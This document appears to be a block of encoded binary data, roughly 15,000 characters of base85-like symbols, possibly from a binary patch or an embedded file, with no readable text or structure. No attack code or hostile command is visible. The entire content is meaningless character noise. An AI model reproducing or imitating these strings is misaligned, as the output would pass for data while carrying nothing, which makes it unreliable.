zIj=j9_nfP`kn31BG>G*I=JdgEZX+KEHi8Al#3{w!FMkFhDod32GMa>coE#NcB6*#z zQk#@vmLGU(@GJJicG7}}PYb48O!SkK|ZxRFvQ@oear9Ef$V@S|zc+!A7)$2L_c+I?h zFc|E-_{f8&rgxhREGK(hW}b7W#vS~Ak3Z(;#yIu*AEvG|IsX7ZU#75`uX7lm8Aest z@04B8>SJDR5+!%*1#a`LVlK;jGqtb79Z|OHjICBJ(~MSYP4SurI}30lK!&R0Ks04? z&Tg#^20e;VWWt$wp(b%b$HNZ*o;1HXKx;98n7Ta#&bJx6jKRGX@Cl}@Qoam4{d&UsvBA3MRn*0|Jm6O>t4cFdi zbAjnNJ?+JRoj7%zYjH)N8PnxC&@D)#2|M0HONZQ8m&Vd=oz-$7p2EG|VBZ~zFQgm1&F8@(M!>H5R4 zLhPPAGU*4s=G-N0%~bw<;1&@j8>iNNbu9#COta{T?U>LGk_pEq>ehPu%WVRlt|{+% zspcS#*Uk=#72(<9N7`KJZOWbe<8dsBfyKg-@X&i)0`nt4 z@Ztf6Pp+TAhF6@MJYd8kzQ^>yP4=6X*uLfH{J4rJ=mz`7ITQ=u-YGH8@#FTypyC2U z@4Q^;U$NsWYBWRMc!<>x8C=ple;HJG1Nkzv2nOF+4ym!onBYdc1M`F|odFC%hq4;` zW5VxPRvmo3sk0bLpOZd4iA-$NQVQV&Y)6(OsCfZQDZudFC9?c$6$xqd%9Rs$TgIrn zck3@BmE#1_Q0XyEbbfJWZ&^eKuiq43MlyG-C%o6zGdceNEoaZ^to-L6;AemS{{Z*D z^PlBE#(#v#{u3wbGJk~0{u3ro@tHqF$YeiBll-UY57K1GlOz5R$&)AR44FS!ll&$p z_$TN+;#&c3?S>qMc%-A~Fj}Byk<$ghfp^h6J^RVK z!>QCB1KvU$$ky_}d-~(GoHN2CRp?ATITjh`^>RKYoDcTKYTQYVeeYST+3X+OKC|L_ zDOX=cKadz_(D^a%L9G|T+RS~SjiX*M1-N!0{{SnC^WQ2RAI9E#o)*R}w)TGt z{@FjxOpX`JFlvh$;}za)OK1zgbbR4ok!8>JGv~|doIfXs(r^Kg_GD|p^9)}ih6Eq) z4+<4ZPJeEU9q{WvaHTLFAle7H`{MW$rXImXDSj?R zhU=>CbmJ9DQ|12v=0S|*fjNBRAZnAP9b_bQ91U~cCRe@vW8QS2GnDC!VjWO_KRIw( z=9htyUcvijO+D~mXZM<2HM*Y|I25ad^P1d_4Lx;?P?_HGdlxxt;{|MZm;UFuuC>Fw zAWY&=9(MEwom zLuFWD(OUt7c$_!RZ3I<*vsHM#VW1^`@W~1vho#)s1 z_nh^b{Ry0ZkKgFz*Crft7|j>u#3N09`8=tdq+2_ouTY#E&XnJ8ECRwT?YQs5v9 zmVt;$2ygdhly1HGQKor2|6!GysuY22*Ay}fmKR>nuoQrE7eed?fo2h+>9uqg{7#5f)V)~N5 z6Mr~#>q3XJano23gma*y+0MP=NYO~(e}A?Y`@F-q#&F3CX>+f`FUfOffc$>=gd#T3 z9QD`lhnm7#dyjVZwylDkBL#w~2<&hcZIK8^f0n1nje^@ov*7c5$ zJNJlOWvwHg<=!mpuCm4lyrh<;*{`SH#z;t4jobCF-yU5>RgC`t-Ww{9;{tX)d&r_n zr+f2%Y~4Fj1GK_4+WHQE(;0i1o)cfs-Z^m+LV0~__s2Radb>xm&Ez*i@LSj89MIB5 z!+(6`mbO^q-`jyXMF8#Nul!|6MwVO8?Bx-`Hgxce18+5O5OPhPN8c;!!TjD%7()Z|PLy7Pc-;fL>pqf`1{;hgq-){~4V*JB|a zpPU~Ut)DaV`(g$&+z>oIa>3oy7YnITHvIlSe04uBKzp5FFDXcO&T2V8i^+il{YU(D zj`$GY@6E{;xnYSQQ_vpp)Uw>f$qd)bdEO!xyAroR_`C+R;#{bo#`toRlO{tZOomLKsWN2A`b?QJ 
zev>9o)@1!=Pu67pCQsGG{{RX4%%9;u%72&F$NvDo=ls3qurh995}t4gU!xJ|K6=1{ zcZ~0IgDn2*lmL5h;+E=s1_jW6I8r=Z+KG1H!TK=e$TSNd4|o)aqrr%r><=ychx+(&*94O89^aLxV5xA1LojaXy-E<=k_{2u|)uVmsu?VrzfDoodGAo!HCu7 zc+Ip>w0!3jDU0*?#D^(rAZ##5KABvrgKARj4aYo16lpr^KQWR-_U6n7AoD(Rc6){8 zgcRmVcx${sWGN}&J>oqk&bNY{z@(!=-fF*sRqEnI6Wtsavm!8C)UWJs6c*@d+P*Q( z8tf-K^?-|K>_<)G;D=_8*p9Sx-z@XSFzl)9BRaswQ@FU-D}?b0it10c2dG_Dul&eS z@EsuSJHq}rpz87O6Oh7P317}cOWLc?$^&KN1F(`G8U>*JDf zZo_#{sd?gOcF|>k&b!Xvs#$~OUm3~cX&uHTR9($8`qo3;!)_tkcW}5Z@VKmh5F=fwPPD#Zu&LSdzBcC`c!&0uF3pn?Q z{{TrrJDxR^(e8-o`OWf&+N$z+!~RJw;q3Xtnp5UHI25)*gFNGB?}VB5*o_YP=QSW! z+wY*weLm-FcNh1$3E z?Ozyji>FiHtP49DUW_UU7O?Gb#g1*CDD%c3Y3SR>U16-8rq>@XJzdua`)7AlYPTkg zm50IJE6WaNLS_E|1lpp7!>&g>o($hb3llh>i*KLCQ)y?RmxCG!bPr_haZ_k4vSUU? z-+Ai|^b+J{@Oh&AK6CHUPHG`5eeypxDO$~dkazDZjFsaZ6}SU<9t0V^%q@>0;BXtR z;A-I)UQcWZ65ib9oxL4k3${Gr8d#Tk28DKqSb>WUOd#tZYTsE3i;1{oIPcC+^_}GZ z0PzevGv^~P8}Q(7%ay0R@NF`@oSc3mo#I+mo-`@9Q1*YMT5HpE#%*C!WS=U5wRX1qA0i(txWD1oQi&avBJj}rOSsq=QM6v1LUteayT#|!s>JPf*do1 zO3wf|F&UylkW%x@IA*1n#!-?DZO$m@OS6T5$7-U~nt&W5W#HlZtYOLEo%8GG8@c zI^^dep`(4ZKG;i#WKudB7&tsj+c#!+A)tK+dOG;e7(Q<@nmX6cc!A@V-LnCDkqHs) z*@S_40Z>zo&&~koIKI0Nh_TTX46$a)XxyG`IZ zeaCvE!T$i6_gD}cfC|>32cg#WybWkY<+S)rrI@-tKcB2gVIgSid>roxKq%mjclU}( zNS+-`D1pK~i^Re3N`(fm?BHfpLc<-bV_m+g^HR6YJdF8f))IDaQ#HU8_QtnM2 zJYXy=jBKt?MOKYvq3a$$AMYFjGwk=g(j*Ufa#ztS_4>{N%C9&F8-;yf-V_jx<8?lF z8AXJi+~-(w%4YhD(EINwQq|if=WD#H!ae6fxp~F>hBXA6BiPOc(lHIr4sokuJh<#k z(z>|w`CR3_T;b0BVg3&P0RDad0F2M;k6*9Nep~wQmA^ZGPmN@G{_CHg&J^KC$j1Z! z0J--5a8rdo9k4&+^f^RcV+R6%=jp$HoCMuR)4bwMoRYS@wm;UD#0uBTp z44&W4Py4)i5HwL{{J)&okm}WF&fU0>tjOSOYQD!`X(z-E9{w`8-?eXWU z2=pp{5=>cwj|g(JpZJg1y_#_tf>H@@f!2JrI1KlOWWH6s`pPCHVDnnJyA&bHf!Mg> zHz**2ei%y^p~TzgGf{PKdq=0a@Njmu)>pb36_HGgx>Vi|B^)STLOE zZFX<=&89g@nzf^>9)$b;SiBT(P%AHTOsMVa6PS26_{~M&Z!75x2wG=48(o|Iv5@Y;kHdr? 
zHkl8n_LzoNYwP)p4Dj_9cHUS$5=RQc9p{%SY@5buZaxzL^6v42#V3PDo&NAcIpzfP z{{ZG$n}Ecno>n+yE{cAa7}kHrpLN~O=5-x$Cx;RD5WbDD;S z&>nJyPskG=UbWWr;3~J04?&t+YLs|mclaAO&UoP!e@0OC7O&0-1-*`*94Aya&U|Mb z`qI8xBOEw}8U^X-9x z=`wz=^^ac|cb&7gq0xn+Jm)1AHf2pEbYyxs4JUc7#H*Shjzi0u-f07)Et%vDJO|5J z+F&kl(l*DDoaZOgS=z=;ZOFSI(BnBV*SV*Rjcw%(dcd0=v8D*65h4#cvA;n5-x#fn z{{Ya(zRK*cto)YW9&v!E(^2H}{;-e(PcsFhO%dwmt~8+hY3JuR1e(B3bCKj6#yib! zw=GoKDqfBe{y#RIKgr#P^k@vSP5K(<4{+LpU;pSLk#2 zSZA4?zZlcP^@VuqO7r`DW&Z#m+oFr#ADmJrBE_k@Uw*JF6x=r!9pVNDfq(U4etqWu0M@bEOE8YJ8g{wijv^Hw3#pUqe1J zkuo>kFU!u2Zvd1l^dj%;017ELy^DqA@l&>*7uFF$K3g6We^~h2fYafw`NKE9!UfI` z592Rf)3exIK$o25v+SAW8u#~r{{WOL-`AY<(ga&1q3u8b_9UM^Q8H{2U^M}6O&8ePZ;7C7!+yu!RX3}Zi(N+zpU)<3_g=zct&kFwCLe* zDReOtWF>KEo*%$FcD>++#k3qJKlhGb>#e5Pv))q;9^%MvMEvBRY&dj7X1ev9F|Y() zbl2WiQVMvw;huu`%&>h~@tgh(j=6q)4Hpckj4%s-Z>$Y>lTVf@oW5ANa$Ya2s8d{i zHQ>>;^NMU=Xbn$?@r}eL^G64arf+xN!sDXzf)bLzH_s3L;1x!ZP$K-Fob8ciF;4=v z1{`KOxnG7L7)9&i{5e3pEgbf9qs|(D4V^MQ;HbaQuyPl@n6`?h6Qxft7z0I*L$k-6 z(K2Sg>@j17>Ikow=KzszTFq`}f)jrQ_5QH&aIYjMFaGBZL}>(fGO1kG6!Yo+@o7Mt zVc`D&ooC(|{(dn`i78*YdBc3vbr&}}M7%y(0;2^#1I}FO_DBp>kb+pgesULkD%T1W zI3aPP2dpFvbT@S6i+K4ajO0qGu5*#Jw_Ib(*g??y%22z2VsJX&Tw!Le_18IEM);T* zXH3&^dvY1Rrw@!9bNI;Kn}T(*<0=&8(UFgwIm4gO{=de)a=hhS_F$u@f6iBzJ&Xf| zF;|swVk&1S9~dEpdwa$7q3ys?0|YRm=e*_b3y1#B2vD7n^MS$+1-bP*Y$_J+DUdas zSBz<2k<*8Id8TUUh;cASKoQZxYuyg9=Cup9Tu03q=p@GvjIh1nFeos=Kz!kZYs;ZN z*gZv4fyB?@F}j0w@uq>_?A8M;^dFx;dC1C8z#rHu@pG`gHUoxZ)EyWbCYqh!c%pN& zuYrN}&NjzG3nHy=oSAue$9nOf{q{dxt%CCAxyeP}SU79TAD=&Y(*}aub&-~18umvw zGT+K4e|bgFAU+I{GktPtevigIS8Df8HGlvZARe-faWOovw*%=alg0h>&mRpuUT3SD zIXaVzmfPv6t@v~$>=)<#=YGDi;;xa#9 z-UI-F0Q6;NektDkxqmsaim4>CKY;H%UT3R_8c3iX&L6xu*4k5#N$V0R0tH{ZR6rogxftnvG3S#e0)!&`J7{Cw;WEi5UPn1A4)(NUDcI(&CN{>s z1KiDaG0`{-2xST(#eTDOi?$9NQ!D5L!P)hJf_@zH`NU4T8F8##(suRnd6>-xmXDlu z@9{FlI>5d*7*A@3mT2f%#uF`|bfLyaFg9T-Lr z1H4pJIK6&=5@@#8+ze5|@_w8J1hx(+iqz$J#krHMxyy!Z+4k=jBM072MeBTK>st4U 
za-Y1BD>A1H_{Cn__CK7d##fxLmn-M|W=^ptRJa!uZEC+rl=FN`~b7iZQOnsQUdDq>N=k;+;|aUo!LDoeEpEy8*+ci0{?@f26b2HftFs1N1da59dMZV184 zJIBr*;2ckf82hG=qubA{X@O&jIv;tj4w`w{nvhQq`trpE3F`UZk9nvqeN18Tio^w{ zmkF6IQaMhHhnMiMVdVrD(5K(IjXREaJLt>ZfwjOR_lLT-iTfW}QznG2Q_rInKQw<& zE#|#%&w0ZnH6qpEd47yR-X%tVPva(z-}~8k@r6k_C@Va_JZCr33jwt{4E2FUls{+Z z0~a|oh5JrsHq$qEJL=2pYY0{&f~Svkp9;U;_GU->iJ`F(Lhw&=T0$OZ=8_t-bjJ^ z9?luz?<6TE#%UZ!ZZzEh`19T_5%d1yb%B9nr=wn6;s8$Q{4Ou7u>h=F?c4E#!v!m1 zGw|hQbg)3DPVpdU(P!l4pc(sxdJLzVRld0;lrfQSGm>SRG#*z0kCr_b;k?s^WL(hA zw^ZI>eFC9MVo%9{kWUNgewq6#mCf^xqbj^W#mZ0%i3ij00p}1*N!|j>{HmB&R63Ad zGf?i%k1N&++Kzw8Ma%RY_{VXUU1ZWA zdFK;{+rVPOrtq7@sV83WTo3h=bG*M-#lb(KPI7*pJ~95YrVc(C$7$y^sQB{X=Ip>K zu;tz|Ap_+7FsW!-9JsazEj$_X`NX!PL5L5NuyvoAldxz5N85=sX$0hM_hcnpIJ_&0 z0R#ckCIgor=*~X=EPr~2Jk>waKHB`}HEQo&>}2FnXB%BlJ>lXl(R3fiAwojWG}jpOQbMUd!nZ+K8t$`?V_at6{?&^g2}5cLSU z1A*^0`==m4XB^M^34HU1OYF@A<%71M6CC*~^k$UmFf$(`&JMAnz8}pnyhthDa>d}R zZ=1=WsrX?W87AfH_PNvGXg;#7yJjpfEwn+`II4@=MR<;8u*@UEO&-1jo#w)=cnA#O zGf|>Pa{l?qpa||ZX2e_4?OY)d6u<${w`W?#H&id~>bqP}j;Wt~b0K>R$m#-@&Lwdq zog0?P`OTGTnzdMPbHt>6C>ggA(u5+`o@e^OvYUB&-NJg0LOw)zVQd>=D9I3Tu0f%P5W)qrFR1HpqO`C3@v-JQGk!axdFMc5pG#wa;nnRlBw3?sOk zfvKGccb!m=PalVkxyco{gg!@~ymbX_4ZC6q(|&qbU<~VWvv|b?pbcm` z$IXQ6JZBUB_llvZpcWaw6`ezFz3k3;gW`(4{9?IURDM_)#9W7&iFh1FD&kQUbS|8# zNXKn;dhdBXQhTi-yye}z?>ogC2-JLVHv~C7oMnT~JzD6?DWQemIt`;|SH8+s-oK4jx?ZbL4mRpWg|mFK>+eAEU>^59{=~TX9c}zh8{2aZmaU zVd%h%?~yd(+3SO^&^09wM zllftRx+PqdMJ}zlLDt**rfKy50PA40+J#|KAkE(V z+%5?Ul^)*kHqTQ-iGqy2s6Jeq(n9#|1MO1R?}uJ@A+g9boh}?_oq2HWy(cKn?ucXE z()_ka~8FU)11IzL(Atxh+uEjcqS}16T=niF&1AD~4lr`iW z3Qpg=E@jm&UIL9-@ZfH4w{7ew^tQ7!&LxmAj^$B3Qy5gNOlzg7$<|tVz@QKyod`1J zn}O0|#@M-0Fo2^7GkEL8CYFjE723*n{Lnz*+8cuRInADK4Gta_)meZs3iT(gs?-sKi*#aaA{0}If-@}O;LB^V zrpNY4?mei$mS}n;B;y>k1Q@7thpanjR)6~EEU=1&6{X{xmOzFkfO$>vfFcdN zHN`V{GS>bp(T&%Fw@ssO271^uf`8{UjUq(y^Xn%ipxZ0g%e>LHl!%YJ*@LL&=vv-y zIQ}Hrr8IKWv&J}Wq=6dm41vs4?A0NLmVzb)8Y;WI6b!G$6S+# z;|_WgTVMu((PjX&UQuwFA4JIi0L8!+Ciy0@V~B7Dv;Kw)g#2PN&#hwk*S7?C{AJzO 
z<0EniVXit6UJc>N@bu&%`v==Jvi-TmvjemIaXy2T%pEb{H(b*OG&-}VDqm-e zEX$6|G61Opi9F?m{EYg<%24PZCRTI@4ScLY?2|W)rOV9tlO3Bfhfk4u5}tu_z(7t- zvSq7=w=pNFPhm9VUY{X`vX#PvO`&oQES-^JNU*U8es(F`ngBNW%hj$f68Y_lF0vYYGl$Mq_lrX!*#clvD2muV zy!1QBHRjd(Gga+1rZnrSQG%`yZ1-@L(|2X0L;)ul19qV^IX#HDrX+o;<|nQH09xk5 z`d*Yfw!WFP(Z&=S#XMtX+}BzS!p))hmkt%w={G?eY|D1wOA=%9Qm02w+4NmdZHnk+ zMwO#lgL94n0W4*92FueC7n-B40@C?!PO!RKb~V&+@>VOnbi_8{6OZ^fG1LzS(Wuwo zhUjeCL=M4~=i@e#%n4IFIkGsdA)D!F)2-VS@NS^D4nNw?sh_&UQLTKvXO>W}5Tz6l zY8#R#Mj|NT*BovK;u=GCgn|ZXG;wKV9_?l<>BEBZLs7ZE?`F)HrS@E$cFi8Ipnr+JX)qx-)~wXemwG#&NC; zU{p8f_V{F~VfhN^2(%9Kl*1l1+&pKVOHu+xue{MnAdmZ!+}L-4a0#zWSZP6Oyl_6U zq(UKiZ$ASsM|!oB%MZ1@B54}^^Gae$4&lk1vTh!H@OOB_c@`I{i;nuZhu7nPmfjb8 z;V`EaWoz_&vuQMxt9(+IXA1$smGU7etnLX)_PCJHH#OefyfLy!JW83vDZwkp1}=@L zoyvLiV9Ht=ykC|^du(Iz#r2hd75>&Q!J7f!M>AiH*Yw++)4%-9fku{pCo5j*ztK5+(ndtWV#NlrI3nbqYgqq2iRbcA>0IVt2 z40Wz8)vV(N2ltHmjpqRyhy&)%^=n|M7n~3YzDyaf(S$cs2dC>VI60}KvSbd{2BhZV zT))`PF%M)8hnwR8UZ;IGf7Uw$S@=DR%Gb)}>2h*5To4NomT_@9;S^ zJQ$I{;P7w?*RJz~8vHr$t z8gz!-=aY_C<6qWl1a5%kpIzXg-@;tB7@#QzVhA90Ol&bPNO^MC0}H^waiDsH(&_8o zTGhos;rvHeBN|*6@d}ALlhZZaKtMH9ub`eM1wcBw(2aI@gk2p$6y0@15i+Pz-4kND zPh?aL_5N`~h6!ABXPNT=BI$$r{{VMtS>fAXF~PmnPxgYH!)AF?+=>EE3QmUx(t{K_ z7E5*>c=2VfhkbDir{duA>fj=^4@Br?&PV*S1zR5^uv~^qawlOTC~+QaHju5SjD*0g z7?6y(tAu4n^UNmYjkE@eu_rMc1H5(vJd)AdyzEL*bD$8!$%9aS`coQpMkrCUB+`p( zwc&NNGwQ6hVwAPGM)F~gHws~ySgwJ<%ZmYS>7<4}B!&nX2;qZ=?Hve{G^{Js9MRW9 zOM7K_)Tds^YV_88t!Zg4&MYvH+8c*b0q;*PJ-1(YcLs6Dikvvfj)g^v#pE80CrfhvSN6fJ8V;kdZ3B++TmH_bcP>M8d;oUgiU9&! 
zrzP8lJG4tBO6a=h9`$~Z;yq&FvgdPqxa+KW;vu*o+DkKTTB5+ICKX;)rHXsc7eXtb z16{_5Wt+JC@#;7TZOSb9D(hFt=yTR`Y!w14u7`N8YQ(4*zo^8@%2oFn=KK2Jq2`mFOHf7=yb6;&%w|T{6reb}%GRgP6SsJ3Wm`5e9@(qsX}Y zBXSi{;EUD4E`kjz!Bo8vqccnT$f^#|M^>|`UyXoCo&nB%wfyp7iH62qz792;#S}Y= z;x}>r?45ylUrFzMVvGa;V2RFnsk;4VRw)NZ`(`^)L5F7&v52BOH=8om-0kl>98P;W zy=J!5ksbp-<$1y{1Zxkv;|u20YF@MWc-GC5Z;TY-=bw4y<5|*3hgb-<2LZmZ4v7B% zryneEy1Zv6&VMf*w~4{tcX6&WjvcYz1Z7)_d6;#5GmJvb-#f**o_Npt8Ng0&7ZeLF z*yzBRMDQt|J$;nKm7+`%4FYkv3*{X@vmR=`2;pIUqwp}ou2xg0e*(WbQP^q_DKs6A z7)Q=}1qqtu)a9Dzc#@Uq2y2zM2>ZYSD^vl5a`ptjG}#ONDdHPW|;ydy*6#wKMZnIY zYeNJy0|VmXD|TR_YawHVj{41P!G(zTWD30&;a~y_K7_}?jdlVQ9b}_gaKWH1U}nC+ z2Vl_@NDL&QEj0++Le1_SHRaV>RBhG?AR1cFQbyf)w-u#=QR&~BJZ0Ah<<22ude?mh z6h%kCnG?nQ`@uC@U$mQUoLfvabM}ERScg!oXv!Sr6H&`4I3P=!WGP2yJeNiry!qPy z0510Fd2?0txK$u6Xnk0=H)3Q#Afvaurl+Qr8~#QQG7A^UvjX#_gpzo)*G%AjDbMKV z&Oo9f;zIubwrVut90It_8KhcpJcE}s2>IfiQ@kX$r#ScFw?-LyG&BW9-ZTDoK<4&g z^{Jzh>#}ORxW}TFC|&?OrVZSid)tU1tsqUQ&juvDeWN%PBEWj{w))PZcw=^FKY2GTL%}t) zj56Kw?+pw93Q{Lsw<;lv-M3IzUB65rWi;K7TDhm#z>&*atc`#c&>+zO68``r^&?tv zVml}2uQ2rNpmRY6)qxykgf)(qgf;*Lj-C$HfdGR@cU^AXVTIB=n}BJuz#@lKOqU}s zGDRTZF6gw{4c^}h&jSYWq6r-{{Yq4@gAeB>J* z@CNG%H>VpwRO?IL7~yO$&7Fi}4L)#m>}b0V-_-tu0r1jZ|o)}f+k)^g6dewFNkpxXw4C@tLq zo2EyU^vC;w{{R=ir3;l0G%PJD%1bz)9Hj(tRTIl*iK|>VzIE}LTwzjZaEVAAQYir7 z7Z?H_^@CVLU;rT1xZJc?fpBap&+t`BzU=#J49E+7`cT|qU%`gU>oyKR;xJxZtti$~6*68b^4%sfk?jnIKumk!0*vd zEo^c6wiBiwLKi`hVDvAP`|-K~hOi=e-(;50RsfR&zQu*$sZ$aVByDHKf#lO}`!qVu z?$YoZ%e+zM)T5fU_0Cw?B*&n{EnJE`2{HM^IZ?woYnkff)u`9hFf)=&f~|SM<|J}b z1YUN9Fy`M6N66?sxKGls6PW42s;k7X2YZiQW}W&`^;j1*8g9_K6li>7au=qy>z~Pj zCJjC*)K@dOiu%yBH8pnZb}$%8;H$IHO{;0G@@ z2?v{;Gfon?)qgA-+FkDH3GasT5oDSU@<_WHQUT<>KtT$Xt?^7B=dn;k_SBi`4RN|2 zdWlw(SxKHNl!4Hq5P&iIgsTnHgTwg4jDPlA<}#s(;#M2TbbWrs!E>--^d0R9Jfh7F zmamJWIb4YDRSxhxP(F~Xk7y$nN06V~?kaEEs<1jY*;N>)8KjiCvpxW^l79UYoCRxjG z?xtc7YrQsLlw>B1XpE< zAi_tR4Z3cvb?HNWC9~YNrU_yakiKxXgM>$;q+!w9rBaO}Jr$!IY~#kx;6g<<@vFA2 zUfis3qpaPLMe&N!P&Mv^Uj&KuQ7&*Gf}tMh&u`p 
z5i?d5!9eMrGYD}I6cUAxbm8Dz7%k9bMyN<^Occ9bK>v1<$;sq)R9;0g&{mUN^+cyGFP z$ic`VMqT@Y5O#ZU+-ivrBAO#n_;im87<>uGO^gA;@`d?a9vz!uHU4B6NVvWB8^micsR(3v*Xp`FX29d!xyeImX4<=!1=kePyy7Y~nQSb2 zw|G#she(Ao%q!X|HA|;xab89}@E2E-;#A)* zwkgr^G4Recf^?SyFlLr*aXtVh+yh~z4;>~7^4C*Sxv7AFfFoZlZKv6;*!9^JOPylU zjgfI7_IV3(7TF6|z9IH0~bRou}bp*5qNQ_UHLGUNhi_^v32S~W3@AU56rN9cy> zSkvV22t}OHysZTO!RHDtlI5c&f~*ED1Yd;_e(ap;-wKb)8pHt*mC|_|ZO9|2g@*2? zw}yf8i-c{+d*GtD;%$)Z1$oJ!HW^p@1{9BzSXVKb!z)H?7Y3?q-u}!TB-I}NouInL z{#t+nfM^S&2;;@0sSUPAu0!EbWRI~!I@T*ULZt@(00wu5qF@W`I>l@CGx(o`R*Oyvfc~XEe&inpLA@v3l}Q|` ztmfjvD-IqG5<##Yq{D}AIZqH-v$gPGFe)w=`5^pfS39waX+Q(p45$_yuR%4FFghmG z{n^8&`YqSCDWflgZC2@|rz0h(<2X_}&Jg8{2Ts=ZcC@c~kx^)k938N)c^ByQ4jml4 zVNxQ!APxX;asj=xsvWTBMh-Hp=?J0&bopZJLsAfS2H*+4vzOS0cJhQ#Ah%cWiDrbh zpbj@&p=GRcZA7TV1ZA6{eGRhV7n?4V#Os?udlCiC!337G3JOlf?dK4M>yGWa?a$Ne z0|FGcpz$` zhtlYc0TkV`efD;ub_F(xM6+FNI$@?7P$oKxuN?*}Y=Y3jG%ph1^#D%hHsJBL%&Lm4 zTmz6`&0rvnlmw+vM?Ys~v$lYW)qp@zy8AAIl8hRf9h{e_UJBsccb^Sv6Sl<4%pkos z8U;9abOqBjTbQ1J4uKacgl;1vyJG;qCj~HjvIUFq&0m@Wi0;fp}oI9qduiBAup~R{04ryem)Ow$r0L(+mlLkiCm4ok~hck69wv zixF^xpdr9PlN0PVc|Tt3#NY|~2M6HA>j_=vw-<}MszLH3pj#(M?vZ&NfbEX-JM=4n zC??r%INR^Y^wRoMW%sPLo(Ms;lokO?rd)KOh|nMfz}sCa2_?(j^}#0!F-hh~e~4k- zGZ9`X#*QYe$A#VLz~7d`MsY~Nd#$HQC=OWC=ks3CiF-JA&KU zgqk#@0o^L|Qw*#Pu+wyH45HS0gQO)!G72L_*llzK@ePp-a~XvJ8NCSK^U%0t)vh7? 
zwly~%3duNA^GU`6F7Y<4(4!?0ezov+)%CmrfuUfHdd;w0b0?RBG0usD zfrtfDeN8keHH=^ZxCfA{0_IIz1Sr+WWiAtlMUiJi0*#JC zcLKpT)3;F37kPpJfW4F&IGAIz&I#uWwy?6%0)Q7Htpq0eu5ZjBFgp2h92iMo9Gx@~ zM@w$q+@2D38AUM*QOdiQKoSs=Y~QROh_wKI+B~s(M(Ug~ zYJlroor&z+F4C!IC@?(&epEYMVzf~Xkr;8K4GtsGfCqewysx)A&@t2esk+?G&oQf5 zf9?P%$`y?EE?eg{s=|rrRkSXKJnvO)I!$eK;5Av#QKX81Ho-pgMKJD4B*x5grAK-B zRB<=G%~F~6CmF6wfEl|%%|={g5UpgbcLKSs3+SoAZM-p|ogS3IOxmm&2|AGTz$iBY zfbIGD?4sMNyw2t?q$G-4fK?2x&lYa5Q1xg_!JM2tjENS<1+H)AIYoP#z}L7Uz;OiG zn5Ax*Fo`0BAX=&^7GMeIsoXW=WYi(=8#RYr-G%}LZUQZ!@}4N%s>x%I)SvStPsxE| z=E|HL3y{{>q1Y0vs2C$*a7nvxEiIu(VuB5p7tWRgM&CHbO=s6Fd_z9a)c%g}Am z2i~Xc482*a%x{GFoG?WKNg(d!T{{R#gV}4hzYUV03&k!wg6D6qT13K=%j>pgX*vKy z41kM7U5~J?6-}5Ys19rx7e(0Lzw6cS@d5`}T z7Fo8U%SIaa8_;F1!dEtNBx~uQ-=(z2?lOw-nKZv8IcIO8m$(EUMR?*<8JmGkHKD)? zfN!RbC(sxrPAbv;mrN(JiSqzdoH0j(9&VIggLb$8qhU)1-L0)r1dsHTDCwt5rDCP@ zFs*Hoy@l%?%7aZHXKi4@}LN^4CA*NfbIkVf2o!90<=NN0-$Bd`5%Rt`) zFJTTX1i1mZ{AKLYU$suI74*HvW&>i5d290ZyCPFIByq!|!qZxd?OHQa$9gNE2%#Ex zk+z4h`2aITh9~y6r)b$KGQjd|vI)VWIwyg1L(l0k*^U=?utOd}G1$ z!M)7$o_@KjIQfFLTVa1JDHCImN0X)@x%EP04ZKLF0OjQ!^#ugk3sRMKL`aS50b<$1 zpE%J-NCcs+^>On65g%1`2cD)4?OT$SjVr6%MeCVi`5JI=+Y-?T3Y4di*rN%_+Lb-l z^moBPv_sV;%_5i(j&a4AjF{g(9Gfc?$Tfpf#=(IARB>$eK(Lo)>q+Kf)mc%8?$T-U z<0E0u@+;TS$le9i&`XdJC=FPqCcF8;A?YCRGPpT;jBW>3YI!j+B-7bxl0y_6Z#TOa zZmMfbDA$p`BF^%Ij6|HuXbYBydQ>|=gpC5h(TPyP1q?8O>9bSrAQs!MF-~a5zXX7J zFn=oregh>-1wT|Zgcy1?G zYkK!$Wdc=_zX1OLxX6W)&l;o4(S%R;E9D2Z9+krTT>aETYoe98xq9)4gba8E&NnbT zZ>zc5O-v6RK)C=^A|vB8yc0<3WL<{`+wjF5 zBv2nFa(D5%{ANO9`LDJhKJjgQ31b`v^>R=Nv}wRjxBW<3OoS#i>EY$G^xhd~hT@Ph z$iODq(cV=8_@o2Gswt%F!SNm+4$Fb@R_C|wLTE_Rx-vs_A0 zXdT$2@s0~a`xsnw4*vkjorbq)FFb_%F*fmVWv`_mG>ZFOW1&IfuM4rdEZMMq7y|pyBO20rVp!9itsL?o?)dj>O4_*jcGqV%uT&vbir8yHJ zE|;(<6yRrx)ItuQvf8&+ra0df4}MMN*bgk{nbXAAksyE$U4Zdcyi{j|j}|guvm@bD z2?{CD7TGJDU{pjC0&&iWI*-C&;cW&bq;G%^QwKA1rH3p06V&VUO!L7MMbg=YNky;( zl8gv>^E$A+o)UsKIwjUIG%Qe)Zm@O@Oh(cnoCl$Sb&gazARSwB?gT=xr5OubM_3eD z2H-{-Xu5#_#!WFu1vtQ>?VTGuurL5Zzi!6#By`7{8!nQ23!r$Ig+0mfoH~LA!<-Sw 
zcAH2b2Vu;Rry*+g04N0IOGf_yA;S(|06RzbU;w{OV09@nOgtEw6u$`EBuz2V9XKHT?9XJ}EdstyH5Bbr zCp*Str$!nW70pgE`io*_idgkFnU%bot=daj(04c_s@}q(Xgegxo#huRDF*_G-^XJ7 zrbkN5aV6XmK*G^!qZqy}Xf2NEBkbk=WTP89#0JS2=J1nkjfcXmh&l|_I+3fpLylKr zSQ%6(8pSRtk6ns1FvKaF=MuMl>5PPM#%xAg zwJGY6pfk^s-Sk2f@|+M?L*G&V0LCeNsayWd6xwc3X~-{=p0ykb+ZGZS6xN3j5+J*! zqz6iX1q!D$gT)UAMqBGOj$)X!c2xwxP3NIDRD=TyFg>are7WLYelh1w5#V48qXHK? z7KGVr0cc5XKaU2>MkB6czS#6rV|z#g1n)=hX|(4L#=?ia3nC?vu@?xo#J~ckLQcaxQIO!`sCA^s zy%tX8PoW|}+NS^uUQ$yk%A^#kVCR66#myLnl^R^Md2kTG6CG%h90?)i07vB^YeaCS z=&N9zfq4b7e8ipgu+Bq zRJdODR2puKnGro1gD${l9b&tFw+b^wsx;Vo%5LfrH}J$#0XbTMP2rfki4>?d2V@w# zoKlr5lvP%I)4np@4==og$^?{pK!eM97SIsv8t_SW8L=ewS7KlySAvrzbUmePPnigK z-C8`-8)ybNy7HuuV2{8p2(!NTnolSapUzR5c?1C1!u1{RDDPqSdS$KkigFJCL`5WSg^qKGuOCaMv8eLK z-4pNVrUFm?|+y4OZPznS>B+3w8&OR87#H=B+CryH+Q4LpQWnxc<`Ez_< 